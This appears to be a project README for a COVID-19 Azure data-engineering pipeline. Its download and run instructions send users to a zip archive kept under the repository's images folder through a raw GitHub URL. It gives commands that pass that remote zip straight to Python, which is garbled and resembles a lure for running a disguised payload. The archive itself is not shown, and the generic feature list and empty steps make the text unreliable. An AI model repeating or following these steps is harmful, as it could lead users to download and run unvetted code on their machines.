The covid19-data-engineering project provides a straightforward way to analyze COVID-19 data. This application uses a complete Azure Data Engineering pipeline, which includes Azure Data Factory, Databricks, and more. With this tool, you can gather insights into COVID-19 trends and statistics easily.
To run this application, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB RAM
- Storage: Minimum of 500 MB available space
- Internet Connection: Required for data retrieval and software updates
- Azure Account: Necessary for Azure services used in the pipeline
- Ensure your system meets the required specifications.
- Create an Azure account if you do not have one. This step allows you to access Azure services.
To get started with the covid19-data-engineering application, you need to download it.
Visit this page to download: Download Latest Release
- Click the link above to go to the Releases page.
- Select the latest release and find the download file.
- Click on the appropriate file for your system (e.g., .zip for Windows, https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip for Linux).
- Once the file downloads, locate it in your file manager and extract it if necessary.
-
After downloading, navigate to the folder containing the application.
-
Open a command line interface (CLI) or terminal window.
-
Run the starting command. For example:
-
On Windows:
cd path\to\folder python https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip
-
On macOS/Linux:
cd /path/to/folder python3 https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip
-
-
Follow on-screen prompts to proceed with data analysis.
- User-Friendly Interface: Experience an easy-to-use interface designed for everyone.
- Data Integration: Seamlessly connect to Azure Data Lake Storage Gen2 to pull in data.
- ETL Process: Extract, Transform, Load (ETL) pipeline to prepare your data.
- Analytics Dashboard: Visualizes COVID-19 data using Power BI.
- Real-Time Updates: Fetch the latest COVID-19 statistics automatically.
Should you encounter issues, here are some common solutions:
- Cannot Access Azure Services: Ensure your Azure account is active and configured correctly.
- Application Does Not Start: Verify that all dependencies are installed as per the requirements.
If you have questions or need assistance, feel free to open an issue in the Issues section of this repository. We are here to help you use the application effectively.
The covid19-data-engineering project covers a variety of topics related to data engineering and analytics, including:
- adls-gen2
- azure-data-engineering
- azure-data-factory
- azure-sql
- covid19-analytics
- data-engineering-project
- databricks
- etl-pipeline
- power-bi
- pyspark
To stay updated with the application:
- Regularly check the Releases page using this link: Download Latest Release.
- Follow the installation steps again to fetch the latest updates.
A big thank you to the developers and contributors who made the covid19-data-engineering application possible. Your efforts help make data analysis accessible to all.
For more detailed information and advanced configuration, please refer to the documentation within the repository.